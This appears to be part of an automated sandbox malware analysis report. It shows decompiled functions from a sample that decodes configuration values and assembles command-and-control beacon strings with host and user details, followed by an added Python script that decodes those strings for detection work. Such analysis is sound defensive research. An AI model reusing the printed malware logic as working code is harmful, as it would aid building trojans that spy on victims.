                                                  • Instruction Fuzzy Hash: 33012839734205EAE7009EE6DC8DF7AF6A9EF95264F500036BD89D6090D6A5DC429730
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  C-Code - Quality: 92%
                                                  			E052D4094(int* __ecx) {
                                                  				int _v8;
                                                  				void* _v12;
                                                  				void* __esi;
                                                  				signed int _t20;
                                                  				signed int _t25;
                                                  				char* _t31;
                                                  				char* _t32;
                                                  				char* _t33;
                                                  				char* _t34;
                                                  				char* _t35;
                                                  				void* _t36;
                                                  				void* _t37;
                                                  				void* _t38;
                                                  				intOrPtr _t39;
                                                  				void* _t41;
                                                  				intOrPtr _t42;
                                                  				intOrPtr _t43;
                                                  				signed int _t46;
                                                  				intOrPtr _t49;
                                                  				signed int _t50;
                                                  				signed int _t55;
                                                  				void* _t57;
                                                  				void* _t58;
                                                  				signed int _t60;
                                                  				signed int _t64;
                                                  				signed int _t68;
                                                  				signed int _t72;
                                                  				signed int _t76;
                                                  				signed int _t80;
                                                  				void* _t85;
                                                  				intOrPtr _t102;
                                                  
                                                  				_t86 = __ecx;
                                                  				_t20 =  *0x52dd278; // 0x63699bc3
                                                  				if(E052D8748( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
                                                  					 *0x52dd2d4 = _v12;
                                                  				}
                                                  				_t25 =  *0x52dd278; // 0x63699bc3
                                                  				if(E052D8748( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
                                                  					_push(2);
                                                  					_pop(0);
                                                  					goto L60;
                                                  				} else {
                                                  					_t85 = _v12;
                                                  					if(_t85 == 0) {
                                                  						_t31 = 0;
                                                  					} else {
                                                  						_t80 =  *0x52dd278; // 0x63699bc3
                                                  						_t31 = E052D3F7C(_t86, _t85, _t80 ^ 0x724e87bc);
                                                  					}
                                                  					if(_t31 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
                                                  							 *0x52dd240 = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t32 = 0;
                                                  					} else {
                                                  						_t76 =  *0x52dd278; // 0x63699bc3
                                                  						_t32 = E052D3F7C(_t86, _t85, _t76 ^ 0x2b40cc40);
                                                  					}
                                                  					if(_t32 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
                                                  							 *0x52dd244 = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t33 = 0;
                                                  					} else {
                                                  						_t72 =  *0x52dd278; // 0x63699bc3
                                                  						_t33 = E052D3F7C(_t86, _t85, _t72 ^ 0x3b27c2e6);
                                                  					}
                                                  					if(_t33 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
                                                  							 *0x52dd248 = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t34 = 0;
                                                  					} else {
                                                  						_t68 =  *0x52dd278; // 0x63699bc3
                                                  						_t34 = E052D3F7C(_t86, _t85, _t68 ^ 0x0602e249);
                                                  					}
                                                  					if(_t34 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
                                                  							 *0x52dd004 = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t35 = 0;
                                                  					} else {
                                                  						_t64 =  *0x52dd278; // 0x63699bc3
                                                  						_t35 = E052D3F7C(_t86, _t85, _t64 ^ 0x3603764c);
                                                  					}
                                                  					if(_t35 != 0) {
                                                  						_t86 =  &_v8;
                                                  						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
                                                  							 *0x52dd02c = _v8;
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t36 = 0;
                                                  					} else {
                                                  						_t60 =  *0x52dd278; // 0x63699bc3
                                                  						_t36 = E052D3F7C(_t86, _t85, _t60 ^ 0x2cc1f2fd);
                                                  					}
                                                  					if(_t36 != 0) {
                                                  						_push(_t36);
                                                  						_t57 = 0x10;
                                                  						_t58 = E052D6ED2(_t57);
                                                  						if(_t58 != 0) {
                                                  							_push(_t58);
                                                  							E052DA5D6();
                                                  						}
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t37 = 0;
                                                  					} else {
                                                  						_t55 =  *0x52dd278; // 0x63699bc3
                                                  						_t37 = E052D3F7C(_t86, _t85, _t55 ^ 0xb30fc035);
                                                  					}
                                                  					if(_t37 != 0 && E052D6ED2(0, _t37) != 0) {
                                                  						_t102 =  *0x52dd32c; // 0x73095b0
                                                  						E052D75E9(_t102 + 4, _t53);
                                                  					}
                                                  					if(_t85 == 0) {
                                                  						_t38 = 0;
                                                  					} else {
                                                  						_t50 =  *0x52dd278; // 0x63699bc3
                                                  						_t38 = E052D3F7C(_t86, _t85, _t50 ^ 0x372ab5b7);
                                                  					}
                                                  					if(_t38 == 0) {
                                                  						L51:
                                                  						_t39 =  *0x52dd27c; // 0x202a5a8
                                                  						_t18 = _t39 + 0x52de252; // 0x616d692f
                                                  						 *0x52dd2d0 = _t18;
                                                  						goto L52;
                                                  					} else {
                                                  						_t49 = E052D6ED2(0, _t38);
                                                  						 *0x52dd2d0 = _t49;
                                                  						if(_t49 != 0) {
                                                  							L52:
                                                  							if(_t85 == 0) {
                                                  								_t41 = 0;
                                                  							} else {
                                                  								_t46 =  *0x52dd278; // 0x63699bc3
                                                  								_t41 = E052D3F7C(_t86, _t85, _t46 ^ 0xd8dc5cde);
                                                  							}
                                                  							if(_t41 == 0) {
                                                  								_t42 =  *0x52dd27c; // 0x202a5a8
                                                  								_t19 = _t42 + 0x52de791; // 0x6976612e
                                                  								_t43 = _t19;
                                                  							} else {
                                                  								_t43 = E052D6ED2(0, _t41);
                                                  							}
                                                  							 *0x52dd340 = _t43;
                                                  							HeapFree( *0x52dd238, 0, _t85);
                                                  							L60:
                                                  							return 0;
                                                  						}
                                                  						goto L51;
                                                  					}
                                                  				}
                                                  			}

                                                  APIs
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,052D23DE,?,63699BC3,052D23DE,?,63699BC3,00000005,052DD00C,00000008,?,052D23DE), ref: 052D4119
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,052D23DE,?,63699BC3,052D23DE,?,63699BC3,00000005,052DD00C,00000008,?,052D23DE), ref: 052D414B
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,052D23DE,?,63699BC3,052D23DE,?,63699BC3,00000005,052DD00C,00000008,?,052D23DE), ref: 052D417D
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,052D23DE,?,63699BC3,052D23DE,?,63699BC3,00000005,052DD00C,00000008,?,052D23DE), ref: 052D41AF
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,052D23DE,?,63699BC3,052D23DE,?,63699BC3,00000005,052DD00C,00000008,?,052D23DE), ref: 052D41E1
                                                  • HeapFree.KERNEL32(00000000,052D23DE,052D23DE,?,63699BC3,052D23DE,?,63699BC3,00000005,052DD00C,00000008,?,052D23DE), ref: 052D42D8
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: e8952b21402d99a5fb8c1d5eb40fe95d08cf79afd7e663ccd8aa9e937ef4b1c3
                                                  • Instruction ID: 44f4b24635d9e6a3eb85fd55000f089fcace809569088b5bbd76e67207361231
                                                  • Opcode Fuzzy Hash: e8952b21402d99a5fb8c1d5eb40fe95d08cf79afd7e663ccd8aa9e937ef4b1c3
                                                  • Instruction Fuzzy Hash: AA6173B0B35505BEDF10FBB8EC8DD5BFBEDAF582107244A25A406D7145EAB0E9418BB0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 66%
                                                  			E052DA279(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                                  				intOrPtr _v0;
                                                  				intOrPtr _v4;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				void* _v44;
                                                  				intOrPtr _v52;
                                                  				void* __edi;
                                                  				long _t25;
                                                  				intOrPtr _t26;
                                                  				intOrPtr _t27;
                                                  				intOrPtr _t28;
                                                  				intOrPtr _t29;
                                                  				intOrPtr _t30;
                                                  				void* _t33;
                                                  				intOrPtr _t34;
                                                  				int _t37;
                                                  				intOrPtr _t42;
                                                  				intOrPtr _t43;
                                                  				intOrPtr _t50;
                                                  				intOrPtr _t54;
                                                  				intOrPtr* _t56;
                                                  				intOrPtr _t62;
                                                  				intOrPtr _t68;
                                                  				intOrPtr _t71;
                                                  				intOrPtr _t74;
                                                  				int _t77;
                                                  				intOrPtr _t78;
                                                  				int _t81;
                                                  				intOrPtr _t83;
                                                  				int _t86;
                                                  				intOrPtr* _t89;
                                                  				intOrPtr* _t90;
                                                  				void* _t91;
                                                  				void* _t95;
                                                  				void* _t96;
                                                  				void* _t97;
                                                  				intOrPtr _t98;
                                                  				void* _t100;
                                                  				int _t101;
                                                  				void* _t102;
                                                  				void* _t103;
                                                  				void* _t105;
                                                  				void* _t106;
                                                  				void* _t108;
                                                  
                                                  				_t95 = __edx;
                                                  				_t91 = __ecx;
                                                  				_t25 = __eax;
                                                  				_t105 = _a16;
                                                  				_v4 = 8;
                                                  				if(__eax == 0) {
                                                  					_t25 = GetTickCount();
                                                  				}
                                                  				_t26 =  *0x52dd018; // 0xf56cfa1f
                                                  				asm("bswap eax");
                                                  				_t27 =  *0x52dd014; // 0x3a87c8cd
                                                  				asm("bswap eax");
                                                  				_t28 =  *0x52dd010; // 0xd8d2f808
                                                  				asm("bswap eax");
                                                  				_t29 =  *0x52dd00c; // 0x8f8f86c2
                                                  				asm("bswap eax");
                                                  				_t30 =  *0x52dd27c; // 0x202a5a8
                                                  				_t3 = _t30 + 0x52de633; // 0x74666f73
                                                  				_t101 = wsprintfA(_t105, _t3, 2, 0x3d14b, _t29, _t28, _t27, _t26,  *0x52dd02c,  *0x52dd004, _t25);
                                                  				_t33 = E052D1C1A();
                                                  				_t34 =  *0x52dd27c; // 0x202a5a8
                                                  				_t4 = _t34 + 0x52de673; // 0x74707526
                                                  				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                  				_t108 = _t106 + 0x38;
                                                  				_t102 = _t101 + _t37;
                                                  				_t96 = E052D54BC(_t91);
                                                  				if(_t96 != 0) {
                                                  					_t83 =  *0x52dd27c; // 0x202a5a8
                                                  					_t6 = _t83 + 0x52de8eb; // 0x736e6426
                                                  					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                  					_t108 = _t108 + 0xc;
                                                  					_t102 = _t102 + _t86;
                                                  					HeapFree( *0x52dd238, 0, _t96);
                                                  				}
                                                  				_t97 = E052D7649();
                                                  				if(_t97 != 0) {
                                                  					_t78 =  *0x52dd27c; // 0x202a5a8
                                                  					_t8 = _t78 + 0x52de8f3; // 0x6f687726
                                                  					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                  					_t108 = _t108 + 0xc;
                                                  					_t102 = _t102 + _t81;
                                                  					HeapFree( *0x52dd238, 0, _t97);
                                                  				}
                                                  				_t98 =  *0x52dd32c; // 0x73095b0
                                                  				_a32 = E052D9395(0x52dd00a, _t98 + 4);
                                                  				_t42 =  *0x52dd2cc; // 0x0
                                                  				if(_t42 != 0) {
                                                  					_t74 =  *0x52dd27c; // 0x202a5a8
                                                  					_t11 = _t74 + 0x52de8cd; // 0x3d736f26
                                                  					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                  					_t108 = _t108 + 0xc;
                                                  					_t102 = _t102 + _t77;
                                                  				}
                                                  				_t43 =  *0x52dd2c8; // 0x0
                                                  				if(_t43 != 0) {
                                                  					_t71 =  *0x52dd27c; // 0x202a5a8
                                                  					_t13 = _t71 + 0x52de8c6; // 0x3d706926
                                                  					wsprintfA(_t102 + _t105, _t13, _t43);
                                                  				}
                                                  				if(_a32 != 0) {
                                                  					_t100 = RtlAllocateHeap( *0x52dd238, 0, 0x800);
                                                  					if(_t100 != 0) {
                                                  						E052D7A80(GetTickCount());
                                                  						_t50 =  *0x52dd32c; // 0x73095b0
                                                  						__imp__(_t50 + 0x40);
                                                  						asm("lock xadd [eax], ecx");
                                                  						_t54 =  *0x52dd32c; // 0x73095b0
                                                  						__imp__(_t54 + 0x40);
                                                  						_t56 =  *0x52dd32c; // 0x73095b0
                                                  						_t103 = E052D8307(1, _t95, _t105,  *_t56);
                                                  						asm("lock xadd [eax], ecx");
                                                  						if(_t103 != 0) {
                                                  							StrTrimA(_t103, 0x52dc2ac);
                                                  							_push(_t103);
                                                  							_t62 = E052D3CC8();
                                                  							_v16 = _t62;
                                                  							if(_t62 != 0) {
                                                  								_t89 = __imp__;
                                                  								 *_t89(_t103, _v0);
                                                  								 *_t89(_t100, _a4);
                                                  								_t90 = __imp__;
                                                  								 *_t90(_t100, _v28);
                                                  								 *_t90(_t100, _t103);
                                                  								_t68 = E052D1199(0xffffffffffffffff, _t100, _v28, _v24);
                                                  								_v52 = _t68;
                                                  								if(_t68 != 0 && _t68 != 0x10d2) {
                                                  									E052DA1B0();
                                                  								}
                                                  								HeapFree( *0x52dd238, 0, _v44);
                                                  							}
                                                  							HeapFree( *0x52dd238, 0, _t103);
                                                  						}
                                                  						HeapFree( *0x52dd238, 0, _t100);
                                                  					}
                                                  					HeapFree( *0x52dd238, 0, _a24);
                                                  				}
                                                  				HeapFree( *0x52dd238, 0, _t105);
                                                  				return _a12;
                                                  			}
                                                  Instruction address column from the side-by-side listing (one address per decompiled line): 0x052da279 through 0x052da4fe.

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 052DA290
                                                  • wsprintfA.USER32 ref: 052DA2DD
                                                  • wsprintfA.USER32 ref: 052DA2FA
                                                  • wsprintfA.USER32 ref: 052DA31D
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 052DA32D
                                                  • wsprintfA.USER32 ref: 052DA34F
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 052DA35F
                                                  • wsprintfA.USER32 ref: 052DA396
                                                  • wsprintfA.USER32 ref: 052DA3B6
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 052DA3D3
                                                  • GetTickCount.KERNEL32 ref: 052DA3E3
                                                  • RtlEnterCriticalSection.NTDLL(07309570), ref: 052DA3F7
                                                  • RtlLeaveCriticalSection.NTDLL(07309570), ref: 052DA415
                                                    • Part of subcall function 052D8307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,052DA428,?,073095B0), ref: 052D8332
                                                    • Part of subcall function 052D8307: lstrlen.KERNEL32(?,?,?,052DA428,?,073095B0), ref: 052D833A
                                                    • Part of subcall function 052D8307: strcpy.NTDLL ref: 052D8351
                                                    • Part of subcall function 052D8307: lstrcat.KERNEL32(00000000,?), ref: 052D835C
                                                    • Part of subcall function 052D8307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,052DA428,?,073095B0), ref: 052D8379
                                                  • StrTrimA.SHLWAPI(00000000,052DC2AC,?,073095B0), ref: 052DA447
                                                    • Part of subcall function 052D3CC8: lstrlen.KERNEL32(073087FA,00000000,00000000,74ECC740,052DA453,00000000), ref: 052D3CD8
                                                    • Part of subcall function 052D3CC8: lstrlen.KERNEL32(?), ref: 052D3CE0
                                                    • Part of subcall function 052D3CC8: lstrcpy.KERNEL32(00000000,073087FA), ref: 052D3CF4
                                                    • Part of subcall function 052D3CC8: lstrcat.KERNEL32(00000000,?), ref: 052D3CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 052DA466
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 052DA46D
                                                  • lstrcat.KERNEL32(00000000,?), ref: 052DA47A
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 052DA47E
                                                    • Part of subcall function 052D1199: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 052D124B
                                                  • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 052DA4AE
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 052DA4BD
                                                  • HeapFree.KERNEL32(00000000,00000000,?,073095B0), ref: 052DA4CC
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 052DA4DE
                                                  • HeapFree.KERNEL32(00000000,?), ref: 052DA4ED
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                  • String ID:
                                                  • API String ID: 3080378247-0
                                                  • Opcode ID: 6268781f871a6819fd876720e906aeba8634e5cf4beda0ea0473a00730d84441
                                                  • Instruction ID: dbe5fc4a12e1b348cd119352c7f999b2b362f4f21f983a27d0e0c0b5c0a37491
                                                  • Opcode Fuzzy Hash: 6268781f871a6819fd876720e906aeba8634e5cf4beda0ea0473a00730d84441
                                                  • Instruction Fuzzy Hash: AB61A871922601AFC7219BA8FC4EF6ABFE8EF48321F154014F909D72A1DB25E805DB71
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 74%
                                                  			E052D8B94(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                                  				void* _v8;
                                                  				signed int _v12;
                                                  				void* _v16;
                                                  				void* _v20;
                                                  				void* _v24;
                                                  				void* _v28;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				long _t59;
                                                  				intOrPtr _t60;
                                                  				intOrPtr _t61;
                                                  				intOrPtr _t62;
                                                  				intOrPtr _t63;
                                                  				intOrPtr _t64;
                                                  				void* _t67;
                                                  				intOrPtr _t68;
                                                  				int _t71;
                                                  				void* _t72;
                                                  				void* _t73;
                                                  				void* _t75;
                                                  				void* _t78;
                                                  				intOrPtr _t82;
                                                  				intOrPtr _t86;
                                                  				intOrPtr* _t88;
                                                  				void* _t94;
                                                  				intOrPtr _t101;
                                                  				signed int _t105;
                                                  				char** _t107;
                                                  				int _t110;
                                                  				intOrPtr* _t113;
                                                  				intOrPtr* _t115;
                                                  				intOrPtr* _t117;
                                                  				intOrPtr* _t119;
                                                  				intOrPtr _t122;
                                                  				intOrPtr _t127;
                                                  				int _t131;
                                                  				CHAR* _t133;
                                                  				intOrPtr _t134;
                                                  				void* _t135;
                                                  				void* _t144;
                                                  				int _t145;
                                                  				void* _t146;
                                                  				intOrPtr _t147;
                                                  				void* _t149;
                                                  				long _t153;
                                                  				intOrPtr* _t154;
                                                  				intOrPtr* _t155;
                                                  				intOrPtr* _t158;
                                                  				void* _t159;
                                                  				void* _t161;
                                                  
                                                  				_t144 = __edx;
                                                  				_t135 = __ecx;
                                                  				_t59 = __eax;
                                                  				_v12 = 8;
                                                  				if(__eax == 0) {
                                                  					_t59 = GetTickCount();
                                                  				}
                                                  				_t60 =  *0x52dd018; // 0xf56cfa1f
                                                  				asm("bswap eax");
                                                  				_t61 =  *0x52dd014; // 0x3a87c8cd
                                                  				_t133 = _a16;
                                                  				asm("bswap eax");
                                                  				_t62 =  *0x52dd010; // 0xd8d2f808
                                                  				asm("bswap eax");
                                                  				_t63 =  *0x52dd00c; // 0x8f8f86c2
                                                  				asm("bswap eax");
                                                  				_t64 =  *0x52dd27c; // 0x202a5a8
                                                  				_t3 = _t64 + 0x52de633; // 0x74666f73
                                                  				_t145 = wsprintfA(_t133, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0x52dd02c,  *0x52dd004, _t59);
                                                  				_t67 = E052D1C1A();
                                                  				_t68 =  *0x52dd27c; // 0x202a5a8
                                                  				_t4 = _t68 + 0x52de673; // 0x74707526
                                                  				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
                                                  				_t161 = _t159 + 0x38;
                                                  				_t146 = _t145 + _t71;
                                                  				_t72 = E052D54BC(_t135);
                                                  				_t134 = __imp__;
                                                  				_v8 = _t72;
                                                  				if(_t72 != 0) {
                                                  					_t127 =  *0x52dd27c; // 0x202a5a8
                                                  					_t7 = _t127 + 0x52de8eb; // 0x736e6426
                                                  					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
                                                  					_t161 = _t161 + 0xc;
                                                  					_t146 = _t146 + _t131;
                                                  					HeapFree( *0x52dd238, 0, _v8);
                                                  				}
                                                  				_t73 = E052D7649();
                                                  				_v8 = _t73;
                                                  				if(_t73 != 0) {
                                                  					_t122 =  *0x52dd27c; // 0x202a5a8
                                                  					_t11 = _t122 + 0x52de8f3; // 0x6f687726
                                                  					wsprintfA(_t146 + _a16, _t11, _t73);
                                                  					_t161 = _t161 + 0xc;
                                                  					HeapFree( *0x52dd238, 0, _v8);
                                                  				}
                                                  				_t147 =  *0x52dd32c; // 0x73095b0
                                                  				_t75 = E052D9395(0x52dd00a, _t147 + 4);
                                                  				_t153 = 0;
                                                  				_v20 = _t75;
                                                  				if(_t75 == 0) {
                                                  					L26:
                                                  					HeapFree( *0x52dd238, _t153, _a16);
                                                  					return _v12;
                                                  				} else {
                                                  					_t78 = RtlAllocateHeap( *0x52dd238, 0, 0x800);
                                                  					_v8 = _t78;
                                                  					if(_t78 == 0) {
                                                  						L25:
                                                  						HeapFree( *0x52dd238, _t153, _v20);
                                                  						goto L26;
                                                  					}
                                                  					E052D7A80(GetTickCount());
                                                  					_t82 =  *0x52dd32c; // 0x73095b0
                                                  					__imp__(_t82 + 0x40);
                                                  					asm("lock xadd [eax], ecx");
                                                  					_t86 =  *0x52dd32c; // 0x73095b0
                                                  					__imp__(_t86 + 0x40);
                                                  					_t88 =  *0x52dd32c; // 0x73095b0
                                                  					_t149 = E052D8307(1, _t144, _a16,  *_t88);
                                                  					_v28 = _t149;
                                                  					asm("lock xadd [eax], ecx");
                                                  					if(_t149 == 0) {
                                                  						L24:
                                                  						HeapFree( *0x52dd238, _t153, _v8);
                                                  						goto L25;
                                                  					}
                                                  					StrTrimA(_t149, 0x52dc2ac);
                                                  					_push(_t149);
                                                  					_t94 = E052D3CC8();
                                                  					_v16 = _t94;
                                                  					if(_t94 == 0) {
                                                  						L23:
                                                  						HeapFree( *0x52dd238, _t153, _t149);
                                                  						goto L24;
                                                  					}
                                                  					_t154 = __imp__;
                                                  					 *_t154(_t149, _a4);
                                                  					 *_t154(_v8, _v20);
                                                  					_t155 = __imp__;
                                                  					 *_t155(_v8, _v16);
                                                  					 *_t155(_v8, _t149);
                                                  					_t101 = E052D809F(0, _v8);
                                                  					_a4 = _t101;
                                                  					if(_t101 == 0) {
                                                  						_v12 = 8;
                                                  						L21:
                                                  						E052DA1B0();
                                                  						L22:
                                                  						HeapFree( *0x52dd238, 0, _v16);
                                                  						_t153 = 0;
                                                  						goto L23;
                                                  					}
                                                  					_t105 = E052D43DF(_t134, 0xffffffffffffffff, _t149,  &_v24);
                                                  					_v12 = _t105;
                                                  					if(_t105 == 0) {
                                                  						_t158 = _v24;
                                                  						_v12 = E052D163F(_t158, _a4, _a8, _a12);
                                                  						_t113 =  *((intOrPtr*)(_t158 + 8));
                                                  						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
                                                  						_t115 =  *((intOrPtr*)(_t158 + 8));
                                                  						 *((intOrPtr*)( *_t115 + 8))(_t115);
                                                  						_t117 =  *((intOrPtr*)(_t158 + 4));
                                                  						 *((intOrPtr*)( *_t117 + 8))(_t117);
                                                  						_t119 =  *_t158;
                                                  						 *((intOrPtr*)( *_t119 + 8))(_t119);
                                                  						E052D9039(_t158);
                                                  					}
                                                  					if(_v12 != 0x10d2) {
                                                  						L16:
                                                  						if(_v12 == 0) {
                                                  							_t107 = _a8;
                                                  							if(_t107 != 0) {
                                                  								_t150 =  *_t107;
                                                  								_t156 =  *_a12;
                                                  								wcstombs( *_t107,  *_t107,  *_a12);
                                                  								_t110 = E052D85DB(_t150, _t150, _t156 >> 1);
                                                  								_t149 = _v28;
                                                  								 *_a12 = _t110;
                                                  							}
                                                  						}
                                                  						goto L19;
                                                  					} else {
                                                  						if(_a8 != 0) {
                                                  							L19:
                                                  							E052D9039(_a4);
                                                  							if(_v12 == 0 || _v12 == 0x10d2) {
                                                  								goto L22;
                                                  							} else {
                                                  								goto L21;
                                                  							}
                                                  						}
                                                  						_v12 = _v12 & 0x00000000;
                                                  						goto L16;
                                                  					}
                                                  				}
                                                  			}
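                                                  The listing above annotates each pointer load with the dword found at that address (for example `_t3 = _t64 + 0x52de633; // 0x74666f73`) and shows four config dwords being passed through `bswap eax` before they reach wsprintfA. The following Python is an added worked example, not part of the Joe Sandbox report or of the sample: it decodes those annotations the way an analyst reads them. It assumes the decompiler convention that a dword annotation on a string pointer is the first four bytes of that string, and the reading that the four dwords at 0x52dd00c..0x52dd018 form one 16-byte identifier is an interpretation of this listing, not something the report states.

```python
import struct

# Dword annotations copied from the decompiled listing of E052D8B94, keyed by
# the offset constant added to the base at 0x52dd27c in each wsprintfA call.
# The decompiler prints the dword found at the referenced address; when that
# address points into string data, the dword is the string's first four bytes.
FORMAT_FRAGMENTS = {
    "0x52de633": 0x74666F73,  # first wsprintfA format string
    "0x52de673": 0x74707526,  # second format string (E052D1C1A result)
    "0x52de8eb": 0x736E6426,  # third format string (E052D54BC result)
    "0x52de8f3": 0x6F687726,  # fourth format string (E052D7649 result)
}

# The four dwords at 0x52dd00c, 0x52dd010, 0x52dd014 and 0x52dd018, in memory
# order, which is also the order in which they are passed to wsprintfA
# (_t63, _t62, _t61, _t60). Values taken from the listing's comments.
ID_DWORDS_IN_MEMORY_ORDER = [0x8F8F86C2, 0xD8D2F808, 0x3A87C8CD, 0xF56CFA1F]


def dword_to_ascii(value: int) -> str:
    """Interpret a little-endian dword annotation as the four ASCII bytes it covers."""
    return struct.pack("<I", value).decode("ascii", errors="replace")


def bswap32(value: int) -> int:
    """Emulate the x86 `bswap eax` instruction on a 32-bit value."""
    return int.from_bytes(struct.pack("<I", value), "big")


def formatted_id(dwords_in_memory_order) -> str:
    """Reproduce what the four `bswap` + `%08x` conversions print.

    Byte-swapping each little-endian dword and printing it as %08x yields the
    16 bytes exactly as they sit in memory, i.e. a plain hex dump of the value.
    """
    return "".join(f"{bswap32(d):08x}" for d in dwords_in_memory_order)


def memory_bytes_hex(dwords_in_memory_order) -> str:
    """Hex of the raw memory contents, to compare against formatted_id()."""
    return b"".join(struct.pack("<I", d) for d in dwords_in_memory_order).hex()


def recovered_fragments() -> dict:
    """Map each format-string offset to the text recovered from its annotation."""
    return {offset: dword_to_ascii(v) for offset, v in FORMAT_FRAGMENTS.items()}


if __name__ == "__main__":
    for offset, text in recovered_fragments().items():
        print(f"{offset}: {text!r}")
    print("identifier as wsprintfA prints it:", formatted_id(ID_DWORDS_IN_MEMORY_ORDER))
```

Run stand-alone, the script prints the recovered fragments `'soft'`, `'&upt'`, `'&dns'` and `'&who'` for the four format strings, and shows that the bswap-then-%08x sequence prints the 16 bytes in memory order; that is the reason the sample swaps each dword rather than formatting the raw little-endian values, and a detection engineer looking for this identifier in network traffic should expect the memory-order hex form.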

                                                  Instruction address column from the side-by-side listing (one address per decompiled line; 0x00000000 marks goto lines): 0x052d8b94 through 0x052d8dfc.
                                                  0x052d8e09
                                                  0x052d8e11
                                                  0x052d8e14
                                                  0x052d8e14
                                                  0x052d8df0
                                                  0x00000000
                                                  0x052d8ddb
                                                  0x052d8ddf
                                                  0x052d8e16
                                                  0x052d8e19
                                                  0x052d8e22
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x052d8e22
                                                  0x052d8de1
                                                  0x00000000
                                                  0x052d8de1
                                                  0x052d8dd9

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 052D8BA8
                                                  • wsprintfA.USER32 ref: 052D8BF8
                                                  • wsprintfA.USER32 ref: 052D8C15
                                                  • wsprintfA.USER32 ref: 052D8C41
                                                  • HeapFree.KERNEL32(00000000,?), ref: 052D8C53
                                                  • wsprintfA.USER32 ref: 052D8C74
                                                  • HeapFree.KERNEL32(00000000,?), ref: 052D8C84
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 052D8CB2
                                                  • GetTickCount.KERNEL32 ref: 052D8CC3
                                                  • RtlEnterCriticalSection.NTDLL(07309570), ref: 052D8CD7
                                                  • RtlLeaveCriticalSection.NTDLL(07309570), ref: 052D8CF5
